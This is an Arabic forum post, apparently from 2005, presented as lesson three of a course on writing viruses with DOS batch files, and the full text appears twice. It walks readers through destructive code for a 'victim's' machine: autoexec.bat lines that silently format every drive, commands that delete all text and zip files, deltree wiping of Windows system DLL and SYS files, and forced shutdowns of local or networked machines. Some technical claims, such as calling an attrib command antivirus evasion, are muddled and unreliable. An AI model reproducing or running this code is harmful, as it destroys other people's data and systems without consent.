RBG-7
29-08-2005, 02:18
بسـم الله الرحمن الرحيم
طريقة صناعة الفيروسات عن طريق الملفات الدفاعية
الدرس الثالث
المقدمة :
في الدروس السابقة قد قمت بطرح مفاهيم و شروحات لبعض منها ليس له علاقة في الدورة مثل طريقة التشفير و تغير الامتداد و الذكاء الفيروسي مع اني لم اعطي الا جزء منه ان هذا الدرس لا تحدث عن الذكاء الفيروسي لا كن نحن لا نستطيع صناعة فيروس ذكي عن طريق الملفات الدفاعية طبعاً لماذا اخواني يمكننا تطبيق خاصية الذكاء الفيروسي فقط في اللغات البرمجية و هذه التي ندرسها الان ليست لغة برمجية بتاتاً لاكنه احدى اهم مكونات نظم التشغيل الحديثة و القديمة !! و نسبة مستخدمي نظام النوافذ في العالم |382| عددهم ليس بالقليل هذه الفيروسات التي نصنعها لا تعمل الا اذ كان هناك على الحاسب نظام دوس السبب لانه قد اشرنا في الدرس الاول في قسم المقدمة في الجزء الاول ((تعريف)) انه الملفات الدفاعية هي ليست الا حزمة من اوامر نظام التشغيل الدوس ...
1- الكودات الاكثر استخداماً :
في هذه الفقرة سوف اعطيكم كودات يستخدمه اغلب مبرمجي الفيروسات
1.هذا الكود لمنع كشف المضاد على الفايروس
call attrib -h -r c:\autoexec.bat >nul
------------------------------------
2.هذا الكود للفورمات
echo format a: /q /u /autotest >nul >>c:\autoexec.bat
------------------------------------
3.هذا كود للفورمات لكن بالختصار
echo & /autotest >nul >>c:\autoexec.bat ألاولى تعنى انسخ الامر القادم الى
(طبعاً معروف من الكود الاول انة الى الاوتواكسك)
الثانية تعنى اجراء وتنفيذ الامر بدون طلب تحذير بتاع
yes and NO
لأانك عارف لما تعمل فورمات لابد ان يحذرك الاول ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية اذن هذا الكود هو المسئول عن هذا ويعنى ايضا ان النسخ يكون الى ملف الاوتواكسيك فى السى
------------------------------------
4.هذا كود فورمات كل الاقراص |385|
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
------------------------------------
5.هذا كود فيروس العد التنازلي و علاجه :
الكود:
echo off@
shutdown -s اذا فتحت الفايروس راح يعد تنازلي من 30 ثانية ويطلع بدون رسالة اذا كنت تريد يطلع معاه رسالة وتوقيت غير
كود:
echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
echo off@
shutdown -s -t 15 -c "message" -m \\namecomputer طبعا نغير 15 الى عدد الثوان و message الى الرسالة ونغير namecomputer الى الجهاز المراد اغلاقه
العلاج :
shutdown –a
2-مجموعة من الكودات مع الشرح (المفصل) :
اما عن هذه الفقرة سوف اقوم بأعطائكم كودات لاكن مع شرح مفصل جداً
1 - اذ اردت كتابت كود فيروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست |391| اسمة مثلاً اكس
ملاحظة : يمكنك وضع اى كود dos غير الفورمات على هذة القاعدة
call attrib -h -r c:\autoexec.bat >nul
echo كود دوسى >nul >>c:\autoexec.bat
والسطر الاخير يكرر ان كنت تريد اما اذا كانت العملية تتطلب الغاء رسالة تحذيرية فتكون القاعدة
call attrib -h -r c:\autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:\autoexec.bat
مع تكرار السطر الاخير ان تتطلب ويمكنك وضع قاعدة مشتركة
call attrib -h -r c:\autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:\autoexec.bat
echo كود دوسى >nul >>c:\autoexec.bat
يعنى نفكر كدة انا كان الكود هاعترض رسالة فى احد السطور فلابد من اضافة /autotest لتفادى الرسالة التحذيرية
------------------------------------
2 - اذ اردت كتابت كود فايروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست اسمة مثلاً اكس هل هذة الفكرة تعترضها رسالة تحذيرية
بالطبع لا اذن اتبع القاعدة الاولى يكون الكود كما يالي
call attrib -h -r c:\autoexec.bat >nul
echo d: >nul >>c:\autoexec.bat
echo Del x.txt >nul >>c:\autoexec.bat
التحليل
-------
call attrib -h -r c:\autoexec.bat >nul ذكرنا انفاً الان لدخول الدريف والغاء ملف اسمة اكس(تكست مثلاً) فى الدوس كنت باتكتب
c:/ press enter فيتحول المحث |373| الى d:/ للاغاء هاتكتب
d:/Del x.txt press enter اذن معنا الكود الدوسى وقد قمنا بالعملية على كام خطوة على خطوتين اذن معنا الكود وعد الخطوات ومعنا الكود الاساسى للفيرس نستنتج التالى عدد سطر الكود لابد ان يكون
اثنين + واحد (اساسى) + اى عدد لو عاوز تكمل الفيرس لشىء تانى فيكون
call attrib -h -r c:\autoexec.bat >nul
(اساسى)
echo d: >nul >>c:\autoexec.bat
(الدخول على الدريف دى)
echo Del x.txt >nul >>c:\autoexec.bat
(الغاء ملف امسة اكس تكست)
تذكر :::::
echo كود الدوس >nul >>c:\autoexec.bat
------------------------------------
3 - اذ اردت الغاء كل الملفات التي امتدادها .txt في القرص
call attrib -h -r c:\autoexec.bat >nul
echo d: >nul >>c:\autoexec.bat
echo Del *.txt >nul >>c:\autoexec.bat
------------------------------------
4 - اذ اردت الغاء كل الملفات التي امتدادها .zipفي القرص
call attrib -h -r c:\autoexec.bat >nul
echo d: >nul >>c:\autoexec.bat
echo Del *.zip >nul >>c:\autoexec.bat
------------------------------------
5 - كود يقوم بالغاء ملفات النظام |300| و تحليله :
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
تحليلة :
c: دخلنا على السى
cd %WinDir%\System\ دخلنا على ملف السيستم فى الوندوز
deltree /y *.dll الغاء كل ملفات الامتداد DLL. والتى هي خاص بالوندوز
cd\ خرجنا بعد تنفيذ العملية الاولى
deltree /y *.sys و الغاء كل ملفات sys. فى الوندوز
اتمنى ان يكون الدرس واضحاً و اي استفسار او سؤال انا جاهز |469|
تحــــــــــــــــــــــاتــــــــــــــــــــي
طريقة صناعة الفيروسات عن طريق الملفات الدفاعية
الدرس الثالث
المقدمة :
في الدروس السابقة قد قمت بطرح مفاهيم و شروحات لبعض منها ليس له علاقة في الدورة مثل طريقة التشفير و تغير الامتداد و الذكاء الفيروسي مع اني لم اعطي الا جزء منه ان هذا الدرس لا تحدث عن الذكاء الفيروسي لا كن نحن لا نستطيع صناعة فيروس ذكي عن طريق الملفات الدفاعية طبعاً لماذا اخواني يمكننا تطبيق خاصية الذكاء الفيروسي فقط في اللغات البرمجية و هذه التي ندرسها الان ليست لغة برمجية بتاتاً لاكنه احدى اهم مكونات نظم التشغيل الحديثة و القديمة !! و نسبة مستخدمي نظام النوافذ في العالم |382| عددهم ليس بالقليل هذه الفيروسات التي نصنعها لا تعمل الا اذ كان هناك على الحاسب نظام دوس السبب لانه قد اشرنا في الدرس الاول في قسم المقدمة في الجزء الاول ((تعريف)) انه الملفات الدفاعية هي ليست الا حزمة من اوامر نظام التشغيل الدوس ...
1- الكودات الاكثر استخداماً :
في هذه الفقرة سوف اعطيكم كودات يستخدمه اغلب مبرمجي الفيروسات
1.هذا الكود لمنع كشف المضاد على الفايروس
call attrib -h -r c:\autoexec.bat >nul
------------------------------------
2.هذا الكود للفورمات
echo format a: /q /u /autotest >nul >>c:\autoexec.bat
------------------------------------
3.هذا كود للفورمات لكن بالختصار
echo & /autotest >nul >>c:\autoexec.bat ألاولى تعنى انسخ الامر القادم الى
(طبعاً معروف من الكود الاول انة الى الاوتواكسك)
الثانية تعنى اجراء وتنفيذ الامر بدون طلب تحذير بتاع
yes and NO
لأانك عارف لما تعمل فورمات لابد ان يحذرك الاول ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية اذن هذا الكود هو المسئول عن هذا ويعنى ايضا ان النسخ يكون الى ملف الاوتواكسيك فى السى
------------------------------------
4.هذا كود فورمات كل الاقراص |385|
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
------------------------------------
5.هذا كود فيروس العد التنازلي و علاجه :
الكود:
echo off@
shutdown -s اذا فتحت الفايروس راح يعد تنازلي من 30 ثانية ويطلع بدون رسالة اذا كنت تريد يطلع معاه رسالة وتوقيت غير
كود:
echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
echo off@
shutdown -s -t 15 -c "message" -m \\namecomputer طبعا نغير 15 الى عدد الثوان و message الى الرسالة ونغير namecomputer الى الجهاز المراد اغلاقه
العلاج :
shutdown –a
2-مجموعة من الكودات مع الشرح (المفصل) :
اما عن هذه الفقرة سوف اقوم بأعطائكم كودات لاكن مع شرح مفصل جداً
1 - اذ اردت كتابت كود فيروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست |391| اسمة مثلاً اكس
ملاحظة : يمكنك وضع اى كود dos غير الفورمات على هذة القاعدة
call attrib -h -r c:\autoexec.bat >nul
echo كود دوسى >nul >>c:\autoexec.bat
والسطر الاخير يكرر ان كنت تريد اما اذا كانت العملية تتطلب الغاء رسالة تحذيرية فتكون القاعدة
call attrib -h -r c:\autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:\autoexec.bat
مع تكرار السطر الاخير ان تتطلب ويمكنك وضع قاعدة مشتركة
call attrib -h -r c:\autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:\autoexec.bat
echo كود دوسى >nul >>c:\autoexec.bat
يعنى نفكر كدة انا كان الكود هاعترض رسالة فى احد السطور فلابد من اضافة /autotest لتفادى الرسالة التحذيرية
------------------------------------
2 - اذ اردت كتابت كود فايروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست اسمة مثلاً اكس هل هذة الفكرة تعترضها رسالة تحذيرية
بالطبع لا اذن اتبع القاعدة الاولى يكون الكود كما يالي
call attrib -h -r c:\autoexec.bat >nul
echo d: >nul >>c:\autoexec.bat
echo Del x.txt >nul >>c:\autoexec.bat
التحليل
-------
call attrib -h -r c:\autoexec.bat >nul ذكرنا انفاً الان لدخول الدريف والغاء ملف اسمة اكس(تكست مثلاً) فى الدوس كنت باتكتب
c:/ press enter فيتحول المحث |373| الى d:/ للاغاء هاتكتب
d:/Del x.txt press enter اذن معنا الكود الدوسى وقد قمنا بالعملية على كام خطوة على خطوتين اذن معنا الكود وعد الخطوات ومعنا الكود الاساسى للفيرس نستنتج التالى عدد سطر الكود لابد ان يكون
اثنين + واحد (اساسى) + اى عدد لو عاوز تكمل الفيرس لشىء تانى فيكون
call attrib -h -r c:\autoexec.bat >nul
(اساسى)
echo d: >nul >>c:\autoexec.bat
(الدخول على الدريف دى)
echo Del x.txt >nul >>c:\autoexec.bat
(الغاء ملف امسة اكس تكست)
تذكر :::::
echo كود الدوس >nul >>c:\autoexec.bat
------------------------------------
3 - اذ اردت الغاء كل الملفات التي امتدادها .txt في القرص
call attrib -h -r c:\autoexec.bat >nul
echo d: >nul >>c:\autoexec.bat
echo Del *.txt >nul >>c:\autoexec.bat
------------------------------------
4 - اذ اردت الغاء كل الملفات التي امتدادها .zipفي القرص
call attrib -h -r c:\autoexec.bat >nul
echo d: >nul >>c:\autoexec.bat
echo Del *.zip >nul >>c:\autoexec.bat
------------------------------------
5 - كود يقوم بالغاء ملفات النظام |300| و تحليله :
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
تحليلة :
c: دخلنا على السى
cd %WinDir%\System\ دخلنا على ملف السيستم فى الوندوز
deltree /y *.dll الغاء كل ملفات الامتداد DLL. والتى هي خاص بالوندوز
cd\ خرجنا بعد تنفيذ العملية الاولى
deltree /y *.sys و الغاء كل ملفات sys. فى الوندوز
اتمنى ان يكون الدرس واضحاً و اي استفسار او سؤال انا جاهز |469|
تحــــــــــــــــــــــاتــــــــــــــــــــي